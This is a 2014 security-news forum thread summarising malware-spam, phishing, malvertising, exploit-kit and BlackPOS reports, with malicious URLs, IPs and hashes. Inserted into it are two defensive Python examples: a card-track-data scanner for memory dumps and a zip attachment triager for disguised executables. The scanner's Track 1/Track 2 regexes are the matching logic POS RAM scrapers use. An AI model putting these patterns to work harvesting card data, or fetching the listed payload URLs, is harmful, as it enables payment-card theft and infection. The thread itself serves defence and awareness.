** http://www.scmp.com/magazines/48hrs/article/1574227/roam-alone-tips-single-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/this-stylish-jewelry-could-keep-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___
SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustotal.com/en/domain/stat-count.dnsdynamic.com/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
> https://www.virustotal.com/en/file/6082e26c223171124388ba2cf01e65840ef997863f42e418998d97e4fbcd6803/analysis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustotal.com/en/file/3fc9204595ccfacae5624653d96b95e60d25609f560e543054525ca2e56cb0b6/analysis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether is it part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustotal.com/en/file/5df51346ec3d96e781650488caaad85e64afbd2c45ca6228f7c6eddeb70de464/analysis/1408996125/
dnsdynamic .com - 84.45.76.100: https://www.virustotal.com/en/ip-address/84.45.76.100/information/
:fear::fear: :mad:
AplusWebMaster
2014-08-27, 13:41
FYI...
Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo.com/2014/08/morupule-coal-mine-malware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
From: Madikwe, Gladness [GMadikwe@mcm.co.uk]
Date: 27 August 2014 10:43
Subject: Tax Invoice for Delivery Note 11155 dated 22.08.14
Hello ,
Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
Thank you
Regards
Gladness B Madikwe
Sales & Marketing Clerk
Morupule Coal Mine ...
Screenshot: http://1.bp.blogspot.com/-1wXuSVrxknQ/U_2vj2r9FGI/AAAAAAAAFVs/qn_Ls8u3nTM/s1600/moropule.png
Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustotal.com/en-gb/file/b1b121a0ef68b7abf628b4bdf10d583e6996c35a1888779e78d75c2907aebdf7/analysis/1409133512/
___
Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most common used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the times only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
Java .com
Deviantart .com
TMZ .com
Photobucket .com
IBTimes .com
eBay .ie
Kapaza .be
TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
198.27.88.157: https://www.virustotal.com/en/ip-address/198.27.88.157/information/
94.23.252.38: https://www.virustotal.com/en/ip-address/94.23.252.38/information/
178.32.21.248: https://www.virustotal.com/en/ip-address/178.32.21.248/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___
"Customer Statements" - malware SPAM
- http://blog.dynamoo.com/2014/08/customer-statements-malware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
From: Accounts [hiqfrancistown910@ gmail .com]
Date: 27 August 2014 09:51
Subject: Customer Statements
Good morning,attached is your statement.
My regards.
W ELIAS
Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustotal.com/en-gb/file/d4701c59264760f0d9a4e47cb9d7db9cb76445bf4f042c1d845ab5191f1cd689/analysis/1409135030/
___
Royal Bank of Canada Payment Spam
- http://threattrack.tumblr.com/post/95908793833/royal-bank-of-canada-payment-spam
Aug 27, 2014 - "Subjects Seen:
The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
The transfer is now complete.
Message recipient: The rating was not provided.
See details in the attached report.
Thank you for using the Service INTERAC Bank RBC Royal Bank.
Malicious File Name and MD5:
INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb4a2ec18d4a89785009fc1879506a92/tumblr_inline_nayu2cOUqn1r6pupn.png
Tagged: RBC, Upatre
___
AT&T DocuSign Spam
- http://threattrack.tumblr.com/post/95918175803/at-t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
Hello,
AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.
Malicious URLs:
79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2be088fa857d593c69b6a9644b1fec46/tumblr_inline_naz25ifIWp1r6pupn.png
79.172.51.73: https://www.virustotal.com/en-gb/ip-address/79.172.51.73/information/
Tagged: ATT, DocuSign, Upatre
- http://myonlinesecurity.co.uk/please-docusign-document-contract_changes_08_27_2014-pdf-fake-pdf-malware/
27 Aug 2014
___
ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/95917541998/adp-past-due-invoice-spam
Aug 27, 2014 - "Subjects Seen:
ADP Past Due Invoice
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here...
Malicious URLs:
81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/595fe50ab5e77ca2c29866eed0475ea8/tumblr_inline_naz1pmSD3h1r6pupn.png
81.80.82.27: https://www.virustotal.com/en-gb/ip-address/81.80.82.27/information/
Tagged: ADP, Upatre
___
Fake Payment Advice SPAM - PDF malware
- http://myonlinesecurity.co.uk/payment-advice-note-27-08-2014-fake-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Disclaimer:
This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
Cell 270 547-9194
27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)
Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55* . This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2423cecc3c6a33db524d3d067103f9685576c8d1317d7d279917de986057f9ba/analysis/1409154303/
:fear: :mad:
AplusWebMaster
2014-08-29, 03:09
FYI...
The ‘Unknown’ Exploit Kit ...
- https://blog.malwarebytes.org/exploits-2/2014/08/shining-some-light-on-the-unknown-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_only.png
Flash only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Flash_only.png
Silverlight and Flash:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)
:fear::fear:
AplusWebMaster
2014-08-29, 13:39
FYI...
Fake 'new photo' SPAM - malware
- http://myonlinesecurity.co.uk/new-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:
my new photo ..
if you like my photo to send me u photo
29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/e4c328815cc2840b53514e7bdcc43c83b29c0ae4676c755b4ee9587aa8c37db9/analysis/1409297373/
___
Netflix PHISH ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-netflix-site-wants-to-leave-you-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/phish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."
176.74.28.254: https://www.virustotal.com/en/ip-address/176.74.28.254/information/
netflix-ssl .net / 92.222.121.100: https://www.virustotal.com/en/ip-address/92.222.121.100/information/
8.31.2014 9:02AM EDT
___
Internet Disconnection SCAM calls
- http://www.hoax-slayer.com/telstra-tech-support-scam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___
Fake Refund email targets UK taxpayers
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-refund-mail-targets-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HMRC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov.uk/security/reporting.htm
___
New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. 
IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-system-breaches.pdf
___
Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquirer.net/inquirer/news/2362576/microsoft-boots-1-500-apps-from-its-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows.com/buildingapps/2014/08/27/how-were-addressing-misleading-apps-in-windows-store/
:fear: :mad:
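The BlackPOS write-up above says the scraper walks process memory, matches card track data and only then writes it out to a file. The Python below is an added example for the defender's side, not Trend Micro's code and not the malware's: it applies the same Track 1 / Track 2 patterns a RAM scraper looks for, but to hunt a memory dump or a dropped file (such as the McTrayErrorLogging.dll mentioned in the post) for card data, with a Luhn check to discard digit runs that only look like a PAN. The buffer it scans is constructed; the PANs are the well-known 4111... and 5555... test numbers, not real cards. The service-name check at the end is a heuristic assumed for this example (name mimicking "<vendor> Framework Management Instrumentation" but binary outside a vendor directory), not an indicator taken from the article.

```python
import re

# Track 1 (format B) and Track 2 as they sit in memory before the POS software
# encrypts or discards them: the same patterns a RAM scraper matches on.
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z0-9 /.'-]{2,26})\^(\d{4})(\d{3})[^?\x00]{0,30}\?")
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})\d{0,20}\?")


def luhn_ok(pan):
    """Luhn checksum over a PAN string; weeds out digit runs that merely look like a card."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep BIN and last four only; a hunting report must never carry the full PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_track_data(buf):
    """Return track-data hits found in buf, ordered by offset, PAN masked, Luhn result attached."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 1, "offset": m.start(), "pan": mask_pan(pan),
                     "expiry": m.group(3).decode(), "service": m.group(4).decode(),
                     "luhn_ok": luhn_ok(pan)})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 2, "offset": m.start(), "pan": mask_pan(pan),
                     "expiry": m.group(2).decode(), "service": m.group(3).decode(),
                     "luhn_ok": luhn_ok(pan)})
    hits.sort(key=lambda h: h["offset"])
    return hits


def suspicious_services(services, vendor_dirs=("\\program files\\",)):
    """Heuristic (assumed for this example): flag services whose display name ends in
    'Framework Management Instrumentation' but whose image path is not under a vendor directory."""
    flagged = []
    for name, image in services:
        if name.lower().endswith("framework management instrumentation") and \
                not any(v in image.lower() for v in vendor_dirs):
            flagged.append(name)
    return flagged


# Constructed sample "memory dump": one Track 1 record, one Track 2 record, and one
# Track 2 look-alike whose PAN fails Luhn (last digit changed).
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"%B4111111111111111^DOE/JOHN^25121010000000000?"
    + b"\x00\x90" * 8
    + b";5555555555554444=2512101123456789?"
    + b" log junk ;4111111111111112=2512101? more"
    + b"\x00" * 16
)

# Constructed service list (display name, image path) as an admin might dump it.
SAMPLE_SERVICES = [
    ("ExampleAV Framework Management Instrumentation", "C:\\Windows\\Temp\\svc.exe"),
    ("ExampleAV Real Service", "C:\\Program Files\\ExampleAV\\svc.exe"),
    ("Windows Update", "C:\\Windows\\system32\\svchost.exe"),
]

if __name__ == "__main__":
    for h in scan_for_track_data(SAMPLE_DUMP):
        print("track %d at offset %d: pan=%s exp=%s luhn=%s" %
              (h["track"], h["offset"], h["pan"], h["expiry"], h["luhn_ok"]))
    print("suspicious services:", suspicious_services(SAMPLE_SERVICES))
```

Run it against a raw process dump of the POS application (or the dropped output file) rather than a full system image first; the regexes are cheap, but the Luhn filter is what keeps a terminal's own log noise from flooding the report.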
AplusWebMaster
2014-09-01, 13:00
FYI...
Tesco Phish ...
- http://myonlinesecurity.co.uk/tesco-payback-rewards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
Tesco Customer Satisfaction program selected you to take part in our quick survey.
To earn your 150 £ reward, please click here and complete the form.
Screenshots:
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards1.png
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___
Fake Statement SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-01092014-fake-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, As far as we can determine they have not been hacked or their website or email system compromised... Email reads:
Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.
1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dd96f70183fd6f9482243e04b02a75c66040bafa64f612aebc99b4302709f1d7/analysis/1409570924/
___
O/S Market Share - August 2014 ...
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
9/1/2014
___
China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.com/article/2014/09/01/us-china-antitrust-microsoft-idUSKBN0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. 
Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."
:mad: :fear:
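The spoofed-icon / double-extension trick recurs through these reports (Payment_Advice_Note_27.08.2014.PDF.scr, photo.exe, D0110109.PDF.exe and the later NDR bill attachment). The Python below is an added example, not code from any of the quoted blogs: it triages a zip attachment the way a mail gateway or an analyst would, looking at each member's final extension, at any decoy document extension placed before it, and at the first bytes of the content (MZ for a Windows executable, %PDF for a genuine PDF). The archive it scans is built in memory from constructed data; the "MZ" stub stands in for a real PE and is not malware.

```python
import io
import os
import zipfile

# Extensions Windows will execute on double-click; a "document" name ending in
# one of these is the spoofed-icon trick described in the posts above.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
             ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt", ".rtf"}

# Leading bytes the decoy types really start with.
MAGIC = {
    ".pdf": b"%PDF",
    ".doc": b"\xd0\xcf\x11\xe0",   # OLE2 compound file (legacy Office)
    ".xls": b"\xd0\xcf\x11\xe0",
    ".docx": b"PK\x03\x04",        # OOXML is itself a zip
    ".xlsx": b"PK\x03\x04",
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG",
}


def split_exts(name):
    """'Payment_Advice_Note_27.08.2014.PDF.scr' -> ['.08', '.2014', '.pdf', '.scr'] (lowercased)."""
    base = os.path.basename(name.replace("\\", "/"))
    return ["." + p.lower() for p in base.split(".")[1:]]


def classify_member(name, head):
    """Return the reasons an archive member looks like a disguised executable (empty if none)."""
    reasons = []
    exts = split_exts(name)
    final = exts[-1] if exts else ""
    if final in EXEC_EXTS:
        reasons.append("executable extension %s" % final)
        if len(exts) >= 2 and exts[-2] in DECOY_EXTS:
            reasons.append("decoy document extension %s before it" % exts[-2])
    if head.startswith(b"MZ"):
        if final not in EXEC_EXTS:
            reasons.append("PE header (MZ) but non-executable extension %s" % (final or "(none)"))
    elif final in MAGIC and not head.startswith(MAGIC[final]):
        reasons.append("content does not match %s magic" % final)
    return reasons


def scan_zip_bytes(data):
    """Scan an in-memory zip; return {member_name: [reasons]} for suspicious members only."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as f:
                head = f.read(8)
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive():
    """Constructed test archive: one disguised payload, one PE hiding behind a .pdf name,
    one genuine PDF header and one plain text file. The 'MZ' stub is not a real executable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Payment_Advice_Note_27.08.2014.PDF.scr", b"MZ" + b"\x90" * 62)
        zf.writestr("invoice.pdf", b"MZ" + b"\x00" * 30)
        zf.writestr("real_statement.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n")
        zf.writestr("readme.txt", b"nothing to see here\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip_bytes(build_sample_archive()).items():
        print(name, "->", "; ".join(reasons))
```

The content check matters as much as the name check: a .scr is a Windows executable whatever icon it carries, and a file named .pdf that starts with MZ is never a document. On Windows the "show known file extensions" setting the posts keep mentioning is the Explorer value HideFileExt under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced; 0 shows extensions.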
AplusWebMaster
2014-09-02, 14:01
FYI...
Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo.com/2014/09/something-evil-on-95163121188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimate ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
